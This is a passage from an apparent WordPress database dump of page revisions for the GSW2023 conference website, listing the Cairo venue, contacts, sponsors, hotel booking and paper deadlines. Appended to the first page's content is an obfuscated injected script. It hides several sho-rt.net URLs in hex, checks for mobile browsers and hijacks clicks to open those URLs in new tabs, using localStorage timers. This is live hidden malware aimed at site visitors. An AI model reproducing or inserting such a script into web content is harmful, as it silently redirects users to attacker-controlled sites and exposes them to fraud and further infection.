margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:15:53','2023-05-17 05:15:53','',3066,'https://gsw2023.com/?p=4523',0,'revision','',0),
(4524,1,'2023-05-17 05:17:09','2023-05-17 05:17:09','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px 